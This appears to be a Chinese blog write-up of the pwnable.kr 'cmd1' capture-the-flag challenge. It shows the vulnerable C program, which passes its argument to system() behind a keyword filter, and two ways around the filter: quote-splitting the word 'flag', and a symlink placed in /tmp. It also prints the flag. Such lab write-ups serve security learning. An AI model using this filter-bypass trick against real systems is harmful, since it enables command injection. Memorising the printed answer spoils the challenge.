pwnable.kr-cmd1

题目描述:

Mommy! what is PATH environment in Linux?

ssh [email protected] -p2222 (pw:guest)

cmd1.c的源码为:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
 int r=0;
 r += strstr(cmd, "flag")!=0;
 r += strstr(cmd, "sh")!=0;
 r += strstr(cmd, "tmp")!=0;
 return r;
}
int main(int argc, char* argv[], char** envp){
 putenv("PATH=/fuckyouverymuch");
 if(filter(argv[1])) return 0;
 system( argv[1] );
 return 0;
}

看起来过滤了flag,sh,tmp,没有关系,通过shell下面指令拼接可以绕过:

“/bin/cat ‘fl”ag'”

[email protected]:~$ ./cmd1 “/bin/cat ‘fl”ag'”
mommy now I get what PATH environment is for 🙂

所以最终的flag为:

mommy now I get what PATH environment is for 🙂

 

这里更新一种方法:

[email protected]:~$ ls
cmd1 cmd1.c flag
[email protected]:~$ mkdir /tmp/cmd1
[email protected]:~$ cd /tmp/cmd1
[email protected]:/tmp/cmd1$ ln -s /home/cmd1/cmd1 cmd1
[email protected]:/tmp/cmd1$ ls
cmd1
[email protected]:/tmp/cmd1$ ln -s /home/cmd1/flag f
[email protected]:/tmp/cmd1$ ./cmd1 “/bin/cat f”
mommy now I get what PATH environment is for 🙂

在/tmp下新建ln,这里就可以绕过对flag的过滤

About the Author

admin

Leave a Reply

Your email address will not be published. Required fields are marked *